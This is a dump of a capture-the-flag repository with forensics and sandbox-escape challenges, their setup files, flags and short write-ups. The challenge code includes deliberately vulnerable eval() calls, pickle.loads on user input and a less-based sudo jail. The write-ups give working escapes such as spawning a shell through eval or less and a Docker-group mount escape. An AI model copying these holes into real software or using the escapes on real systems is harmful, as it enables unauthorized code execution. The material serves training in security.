-------------------------------------------------------------------------------- /forensics/Investigator_2/README.md: -------------------------------------------------------------------------------- 1 | # Investigator 2 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | Something is fishy… can you look up for traces ? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /forensics/Investigator_2/solution/README.md: -------------------------------------------------------------------------------- 1 | # Investigator 2 2 | 3 | ## Write-up 4 | 5 | Use the volatility famework. 6 | 7 | ## Flag 8 | 9 | `shellmates{g00d_J0b_$H3rl0cK_H0lme33$}` 10 | -------------------------------------------------------------------------------- /forensics/Investigator_3/README.md: -------------------------------------------------------------------------------- 1 | # Investigator 3 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | The headmaster heard someone outside the office laughing, he said he xored his domain name with his favorite number, can you retrieve the real domain name ? 8 | Flag format: shellmates{domainname} 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). 13 | -------------------------------------------------------------------------------- /forensics/Investigator_3/solution/README.md: -------------------------------------------------------------------------------- 1 | # Investigator 3 2 | 3 | ## Write-up 4 | 5 | Use the volatility famework. 6 | 7 | ## Flag 8 | 9 | `shellmates{h3ck3r.b4$}` 10 | -------------------------------------------------------------------------------- /forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics 2 | 3 | This directory contains challenges related to the `Forensics` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /forensics/Smurf/README.md: -------------------------------------------------------------------------------- 1 | # Smurf 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | 7 | Someone is performing a smurf attack, by sending a huge number of ICMP packets using broadcast address. 8 | Examine the traffic Carefully and try to find the hidden flag. 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /forensics/Smurf/smurf.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Smurf/smurf.pcapng -------------------------------------------------------------------------------- /forensics/Smurf/solution/id.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Smurf/solution/id.png -------------------------------------------------------------------------------- /forensics/Smurf/solution/rickroll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/Smurf/solution/rickroll.png -------------------------------------------------------------------------------- /forensics/agentDNS/README.md: -------------------------------------------------------------------------------- 1 | # agentDNS 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | I think i'm being hacked, what did they manage to read ?? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /forensics/agentDNS/capture.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/agentDNS/capture.pcapng -------------------------------------------------------------------------------- /forensics/agentDNS/solution/README.md: -------------------------------------------------------------------------------- 1 | # agentDNS 2 | 3 | ## Write-up 4 | 5 | This is a basic DNS exfiltration attack, you will first need to read about it a little bit, or watch this simple [explanation](https://www.youtube.com/watch?v=fQ4Y8napHzw) 6 | First we retreive all DNS qureies via tshark, then we take one line per two, cause one of them is the actual query and the second is just a response. 7 | 8 | ```bash 9 | $ tshark -r capture.pcapng -T fields -e dns.qry.name > hex.txt 10 | ``` 11 | We retreive the hexdump with a simple python script! 12 | ```python 13 | import binascii 14 | 15 | lines=open("hex.txt","r").readlines() 16 | byte="" 17 | i=True 18 | for l in lines: 19 | if(i): 20 | byte+=l.replace(".secret.base","").replace("\n","") 21 | i=not i 22 | 23 | open("data","wb").write(binascii.unhexlify(byte)) 24 | 25 | ``` 26 | We can see that data is a zip file, unzip it and read the flag! 27 | 28 | ```bash 29 | $ file data 30 | data: Zip archive data, at least v2.0 to extract 31 | $ unzip data 32 | $ cat data.txt 33 | ``` 34 | 35 | 36 | 37 | ## Flag 38 | 39 | `shellmates{DN$_exf1!tr4Too0oO0r}` -------------------------------------------------------------------------------- /forensics/ezCap/README.md: -------------------------------------------------------------------------------- 1 | # ezCap 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | 7 | Hmmmmm, there is something fishy inside this traffic! can u figure it out ? show us your wireshark skills. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /forensics/ezCap/ezCap.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/ezCap/ezCap.pcapng -------------------------------------------------------------------------------- /forensics/ezCap/solution/README.md: -------------------------------------------------------------------------------- 1 | # ezCap 2 | 3 | ## Write-up 4 | 5 | * first, HTTPS traffic looks authentic, we can filter it by: 6 | ```code 7 | !tcp and !tls 8 | ``` 9 | 10 | ![IMG](filter1.png) 11 | 12 | weird `UDP` traffic with `1337` port. 13 | select the packet => `Follow`=>`UDP stream`. 14 | 15 | ![IMG](flag.png) 16 | ## Flag 17 | 18 | `shellmates{1_am_h3r3_h4ck3r_!}` 19 | -------------------------------------------------------------------------------- /forensics/ezCap/solution/filter1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/ezCap/solution/filter1.png -------------------------------------------------------------------------------- /forensics/ezCap/solution/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/ezCap/solution/flag.png -------------------------------------------------------------------------------- /forensics/lies/README.md: -------------------------------------------------------------------------------- 1 | # lies 2 | 3 | **`Author:`** [Your name/nickname](https://link.to/your/website/or/github/account) 4 | 5 | ## Description 6 | 7 | I asked my friend where is he, he lied to me through this picture, can you find the datetime of the pic and prove me right? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /forensics/lies/pic.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/forensics/lies/pic.jpeg -------------------------------------------------------------------------------- /forensics/lies/solution/README.md: -------------------------------------------------------------------------------- 1 | # lies 2 | 3 | ## Write-up 4 | 5 | `exiftool pic.jpeg` 6 | 7 | ## Flag 8 | 9 | `shellmates{2021:10:25}` 10 | -------------------------------------------------------------------------------- /jail/JsandboxS/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x script.js entrypoint.sh 13 | 14 | ENTRYPOINT ["./entrypoint.sh"] 15 | -------------------------------------------------------------------------------- /jail/JsandboxS/README.md: -------------------------------------------------------------------------------- 1 | # JsandboxS 2 | 3 | **`Author:`** [yh_0x7](https://github.com/yh-0x7) 4 | 5 | ## Description 6 | 7 | > Just a casual JS jail. 8 | > Retrieve the flag and get out of this jail. 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). 13 | -------------------------------------------------------------------------------- /jail/JsandboxS/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "JsandboxS" 2 | author: "yh_0x7" 3 | author_link: "https://github.com/yh-0x7" 4 | 5 | category: jail 6 | difficulty: medium 7 | 8 | description: | 9 | > Just a casual JS jail. 10 | > Retrieve the flag and get out of this jail. 11 | 12 | **Author** : yh_0x7 13 | 14 | connection_info: ncat -v --ssl jsandboxs.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/jsandboxs 17 | 18 | flags: 19 | - shellmates{y0U_d0N'7_P4r3n7H3515_70_c4Ll_M3} 20 | 21 | topics: 22 | - JS 23 | - sandbox 24 | 25 | tags: 26 | - medium 27 | - JS 28 | 29 | files: 30 | - challenge/script.js 31 | 32 | value: 500 33 | type: dynamic 34 | extra: 35 | initial: 500 36 | decay: 15 37 | minimum: 50 38 | 39 | state: visible 40 | version: "0.1" -------------------------------------------------------------------------------- /jail/JsandboxS/challenge/.passwd: -------------------------------------------------------------------------------- 1 | shellmates{y0U_d0N'7_P4r3n7H3515_70_c4Ll_M3} -------------------------------------------------------------------------------- /jail/JsandboxS/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./script.js" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/JsandboxS/challenge/script.js: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env node 2 | var fs = require('fs'); 3 | 4 | const black_list = "0123456789!\"#$%&'()*+-/;<>?@\\^|~\t\n\r\x0b\x0c " 5 | 6 | function * func(){ 7 | fs.readFile('./.passwd', 'utf8', function(err, data){ 8 | console.log(data); 9 | }); 10 | } 11 | 12 | const readline = require("readline"); 13 | const interface = readline.createInterface({ 14 | input: process.stdin, 15 | output: process.stdout, 16 | }); 17 | 18 | interface.question( 19 | "Welcome to JsandboxS, I gave you a secret phone, you have use it to escape \n", 20 | function (input) { 21 | interface.close(); 22 | if ( !black_list.split("").some(x => input.includes(x)) ) 23 | { 24 | try 25 | { 26 | eval(input) 27 | } 28 | catch(e) 29 | { 30 | console.log('you can\'t break the walls :(') 31 | } 32 | } 33 | else 34 | { 35 | console.log('you still in jail...you can\'t escape like that') 36 | } 37 | } 38 | 39 | ); 40 | -------------------------------------------------------------------------------- /jail/JsandboxS/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /jail/JsandboxS/solution/README.md: -------------------------------------------------------------------------------- 1 | # JsandboxS 2 | 3 | ## Write-up 4 | 5 | - use `[,]={[Symbol.iterator]:func}` to call the generator `func` 6 | 7 | ## Flag 8 | 9 | `shellmates{y0U_d0N'7_P4r3n7H3515_70_c4Ll_M3}` 10 | -------------------------------------------------------------------------------- /jail/README.md: -------------------------------------------------------------------------------- 1 | # Jail 2 | 3 | This directory contains challenges related to the `Jail` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | 5 | -------------------------------------------------------------------------------- /jail/baby-jail1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x entrypoint.sh 13 | 14 | ENTRYPOINT ["./entrypoint.sh"] 15 | -------------------------------------------------------------------------------- /jail/baby-jail1/README.md: -------------------------------------------------------------------------------- 1 | # baby jail1 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > Check out my project using python 8 | > Python really has some cool functions 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /jail/baby-jail1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "baby jail1" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: jail 6 | difficulty: easy 7 | 8 | description: | 9 | > Check out my project using python 10 | > Python really has some cool functions 11 | 12 | **Author** : Ouxs 13 | 14 | connection_info: ncat -v --ssl baby-jail1.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/baby-jail1 17 | 18 | flags: 19 | - shellmates{D0n'7_m3$$_W17H_EVAL_kID0} 20 | 21 | tags: 22 | - easy 23 | 24 | value: 50 25 | type: dynamic 26 | extra: 27 | initial: 500 28 | decay: 15 29 | minimum: 50 30 | 31 | state: visible 32 | version: "0.1" -------------------------------------------------------------------------------- /jail/baby-jail1/challenge/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | WELCOME = "I made my calculator app using Python. It's so dope. Try it out." 5 | 6 | def calc(op): 7 | try : 8 | res = eval(op) 9 | except : 10 | return print("Wrong operation") 11 | return print(f"{op} --> {res}") 12 | 13 | def main(): 14 | while True : 15 | inp = input(">> ") 16 | calc(inp) 17 | 18 | if __name__ == '__main__': 19 | main() -------------------------------------------------------------------------------- /jail/baby-jail1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./chall.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/baby-jail1/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{D0n'7_m3$$_W17H_EVAL_kID0} 2 | -------------------------------------------------------------------------------- /jail/baby-jail1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /jail/baby-jail1/solution/README.md: -------------------------------------------------------------------------------- 1 | # Baby jail 1 2 | 3 | ## Write-up 4 | In this challenge, we see that if we give an airthetmic operation it will get evaluated. 5 | 6 | ``` 7 | 8 | >> 1+1 9 | 10 | 1+1 --> 2 11 | 12 | ``` 13 | 14 | Since we know that the app is built using Python from the description of the challenge, we can assume that the author has used the function `eval` in order to evaluate the expression. This function can be dangerous since it interprets Python code too, thus allowing us to execute whatever we want. 15 | 16 | ``` 17 | 18 | __import__('os').system('sh') 19 | 20 | ls 21 | 22 | cat flag.txt 23 | 24 | ``` 25 | 26 | ## Flag 27 | 28 | `shellmates{D0n'7_m3$$_W17H_EVAL_kID0}` -------------------------------------------------------------------------------- /jail/baby-jail2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x entrypoint.sh 13 | 14 | ENTRYPOINT ["./entrypoint.sh"] 15 | -------------------------------------------------------------------------------- /jail/baby-jail2/README.md: -------------------------------------------------------------------------------- 1 | # baby jail2 2 | 3 | **`Author:`** [ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > I didn't know it can be that dangerous. 8 | > Now I added some filters 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /jail/baby-jail2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "baby jail2" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: jail 6 | difficulty: easy 7 | 8 | description: | 9 | > I didn't know it can be that dangerous. 10 | > Now I added some filters 11 | 12 | **Author** : Ouxs 13 | 14 | connection_info: ncat -v --ssl baby-jail2.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/baby-jail2 17 | 18 | flags: 19 | - shellmates{Y0u_ar3_st4rting_t0_g3t_g00d_with_LAVE} 20 | tags: 21 | - easy 22 | 23 | value: 500 24 | type: dynamic 25 | extra: 26 | initial: 500 27 | decay: 15 28 | minimum: 50 29 | 30 | state: visible 31 | version: "0.1" -------------------------------------------------------------------------------- /jail/baby-jail2/challenge/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | WELCOME = "I made my calculator app using Python. It's so dope. Try it out." 5 | BLACKLIST = ["open", "input", "eval", "exec", "import", "getattr", "sh"] 6 | def calc(op): 7 | try : 8 | res = eval(op) 9 | except : 10 | return print("Wrong operation") 11 | return print(f"{op} --> {res}") 12 | 13 | def main(): 14 | while True : 15 | inp = input(">> ") 16 | if any(bad in inp for bad in BLACKLIST) : 17 | print("Are you tying to hack me !!") 18 | else : 19 | calc(inp) 20 | 21 | if __name__ == '__main__': 22 | main() -------------------------------------------------------------------------------- /jail/baby-jail2/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./chall.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/baby-jail2/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{Y0u_ar3_st4rting_t0_g3t_g00d_with_LAVE} 2 | -------------------------------------------------------------------------------- /jail/baby-jail2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /jail/correct/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat libc-dev 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | RUN adduser --disabled-password --no-create-home ctf-cracked 8 | 9 | COPY challenge /challenge/ 10 | 11 | WORKDIR /challenge 12 | 13 | RUN chown ctf-cracked:ctf wrapper && chown ctf-cracked:ctf chall.py 14 | RUN chmod 750 wrapper && chmod +x entrypoint.sh && chmod 400 chall.py && chmod u+s wrapper 15 | 16 | ENTRYPOINT ["./entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /jail/correct/README.md: -------------------------------------------------------------------------------- 1 | # Correct 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | > The is a function **check**, can you take a look at it? 7 | 8 | ## Solution 9 | 10 | Solution of the challenge can be found [here](solution/). 11 | -------------------------------------------------------------------------------- /jail/correct/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "correct" 2 | author: Ouxs" 3 | 4 | category: jail 5 | difficulty: hard 6 | 7 | description: | 8 | > Can you **check** this for me? 9 | 10 | **Author** : Ouxs 11 | 12 | connection_info: ncat -v --ssl correct.challs.shellmates.club 443 13 | 14 | image: gcr.io/glowing-reserve-336013/correct 15 | 16 | value: 500 17 | type: dynamic 18 | extra: 19 | initial: 500 20 | decay: 15 21 | minimum: 50 22 | 23 | flags: 24 | - shellmates{Sn4k3_objects_h4s_b33n_corrupted} 25 | 26 | files: 27 | - challenge/challenge.py 28 | 29 | tags: 30 | - hard 31 | 32 | state: visible 33 | 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /jail/correct/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./wrapper" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/correct/challenge/wrapper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/jail/correct/challenge/wrapper -------------------------------------------------------------------------------- /jail/correct/challenge/wrapper.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | char *argv[] = { "/usr/local/bin/python3", "/challenge/chall.py", NULL }; 5 | execve(argv[0], argv, NULL); 6 | return 0; 7 | } 8 | -------------------------------------------------------------------------------- /jail/correct/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /jail/correct/solution/README.md: -------------------------------------------------------------------------------- 1 | # correct 2 | 3 | ## Write-up 4 | 5 | There is a function `check` with a condition. Once we pass the condition, we get the flag. The idea is to send an object to the function in which we will overwrite the '__eq__' method responsible for `==` and make it return True in all cases. 6 | 7 | ```python 8 | check(type('true', (), {'__eq__': lambda self, wthvr:True})()) 9 | ``` 10 | 11 | ## Flag 12 | 13 | `shellmates{Sn4k3_objects_h4s_b33n_corrupted}` 14 | -------------------------------------------------------------------------------- /jail/escape/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "escape" 2 | author: "mel337" 3 | 4 | category: jail 5 | difficulty: hard 6 | 7 | description: | 8 | > Try to replace my VMs 9 | > **Note** : Use the OVA (my_challenge.ova) that has been shared. 10 | > **Username**: kiloi 11 | > **Password**: fghj 12 | https://drive.google.com/file/d/1LWb2nne5l1VtRal-6mabEvEnUlHjInD2/view?usp=sharing 13 | **Author** : mel337 14 | 15 | 16 | value: 500 17 | type: dynamic 18 | extra: 19 | initial: 500 20 | decay: 15 21 | minimum: 50 22 | 23 | flags: 24 | - shellmates{D0ck3R_35cap3_w1th_m0un7} 25 | 26 | tags: 27 | - hard 28 | 29 | state: visible 30 | 31 | version: "0.1" 32 | -------------------------------------------------------------------------------- /jail/escape/solution/README.md: -------------------------------------------------------------------------------- 1 | # escape 2 | 3 | ## Write-up 4 | 5 | 6 | - User is in the Docker group 7 | 8 | - Using doker, mount the filesystem in the created container. 9 | 10 | - You can find the flag in the `/root` directory. 11 | 12 | 13 | ## Flag 14 | 15 | `shellmates{D0ck3R_35cap3_w1th_m0un7}` 16 | -------------------------------------------------------------------------------- /jail/less_jail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y openssh-server sudo less 5 | 6 | 7 | RUN useradd -m -s /bin/bash ch1 8 | RUN echo 'ch1:ch1' | chpasswd 9 | 10 | COPY challenge/real_flag /home/ch1/real_flag 11 | COPY challenge/fakeflag /home/ch1/fakeflag 12 | COPY challenge/my_less /home/ch1/my_less 13 | COPY challenge/perms /etc/sudoers 14 | 15 | RUN echo "./my_less\nkill -9 \$(ps | grep bash | awk '{print $1}')" >/home/ch1/.bashrc 16 | 17 | RUN chown root:root /home/ch1/real_flag /home/ch1/.bashrc /home/ch1/fakeflag /home/ch1/my_less 18 | 19 | RUN chmod 700 /tmp 20 | 21 | WORKDIR /challenge 22 | 23 | EXPOSE 22 24 | 25 | 26 | ENTRYPOINT service ssh start && tail -f /dev/null 27 | -------------------------------------------------------------------------------- /jail/less_jail/README.md: -------------------------------------------------------------------------------- 1 | # less_jail 2 | 3 | **`Author:`** [1m4D](https://github.com/imadbourouche) 4 | 5 | ## Description 6 | 7 | > Can you escape from my less jail 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /jail/less_jail/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "less_jail" 2 | author: "1m4D" 3 | 4 | category: jail 5 | difficulty: easy 6 | 7 | description: | 8 | > Can you escape from my less jail 9 | 10 | **Password** : ch1 11 | **Author** : 1m4D 12 | 13 | connection_info: ssh ch1@less-jail -o ProxyCommand="openssl s_client -quiet -connect less-jail.challs.shellmates.club:443 -servername less-jail.challs.shellmates.club" 14 | 15 | image: gcr.io/glowing-reserve-336013/less-jail 16 | 17 | flags: 18 | - shellmates{My_LE$$_J41L_1S_VERy_We4K_76423} 19 | 20 | tags: 21 | - easy 22 | - linux 23 | 24 | value: 500 25 | 26 | type: dynamic 27 | 28 | extra: 29 | initial: 500 30 | decay: 15 31 | minimum: 50 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /jail/less_jail/challenge/fakeflag: -------------------------------------------------------------------------------- 1 | You can read the fake flag but not the real one XD: shellmates{FAKE_FLAG} 2 | -------------------------------------------------------------------------------- /jail/less_jail/challenge/my_less: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | /usr/bin/less fakeflag 4 | -------------------------------------------------------------------------------- /jail/less_jail/challenge/perms: -------------------------------------------------------------------------------- 1 | # 2 | # This file MUST be edited with the 'visudo' command as root. 3 | # 4 | # Please consider adding local content in /etc/sudoers.d/ instead of 5 | # directly modifying this file. 6 | # 7 | # See the man page for details on how to write a sudoers file. 8 | # 9 | Defaults env_reset 10 | Defaults mail_badpass 11 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" 12 | 13 | # Host alias specification 14 | 15 | # User alias specification 16 | 17 | # Cmnd alias specification 18 | 19 | # User privilege specification 20 | root ALL=(ALL:ALL) ALL 21 | 22 | ch1 ALL=(ch1-cracked) NOPASSWD: /challenge/my_less 23 | 24 | # See sudoers(5) for more information on "#include" directives: 25 | 26 | #includedir /etc/sudoers.d 27 | -------------------------------------------------------------------------------- /jail/less_jail/challenge/real_flag: -------------------------------------------------------------------------------- 1 | shellmates{My_LE$$_J41L_1S_VERy_We4K_76423} -------------------------------------------------------------------------------- /jail/less_jail/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:22' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /jail/less_jail/solution/README.md: -------------------------------------------------------------------------------- 1 | # less_jail 2 | 3 | ## Write-up 4 | 5 | - `!/bin/sh` to get a shell and then `ls` to find the name of the real flag file which is *real_flag* and then `cat real_flag` 6 | 7 | ## Flag 8 | 9 | `shellmates{My_LE$$_J41L_1S_VERy_We4K_76423}` 10 | -------------------------------------------------------------------------------- /jail/pickle-games-1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x challenge.py entrypoint.sh 13 | 14 | EXPOSE 1337 15 | 16 | ENTRYPOINT ["./entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /jail/pickle-games-1/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 1 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Ever heard of the pickle games, they're very tasty! 8 | > Can you get RCE on the remote server? 9 | 10 | **Connect with** : ncat -v --ssl pickle-games-1.challs.shellmates.club 443 11 | 12 | [challenge.py](./challenge/challenge.py) 13 | 14 | ## Solution 15 | 16 | Solution of the challenge can be found [here](solution/). 17 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pickle games 1" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: jail 6 | difficulty: easy 7 | 8 | description: | 9 | > Ever heard of the pickle games, they're very tasty! 10 | > Can you get RCE on the remote server? 11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: ncat -v --ssl pickle-games-1.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/pickle-games-1:latest 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{lEt_thE_piCkl3_gaMeS_BegiN!} 28 | 29 | tags: 30 | - easy 31 | 32 | files: 33 | - ./challenge/challenge.py 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pickle 4 | 5 | 6 | def check(data): 7 | return len(data) <= 400 8 | 9 | 10 | if __name__ == "__main__": 11 | print("Welcome to the pickle games! (Level 0)") 12 | data = bytes.fromhex(input("Enter your hex-encoded pickle data: ")) 13 | if check(data): 14 | result = pickle.loads(data) 15 | print(f"Result: {result}") 16 | else: 17 | print("Check failed :(") 18 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 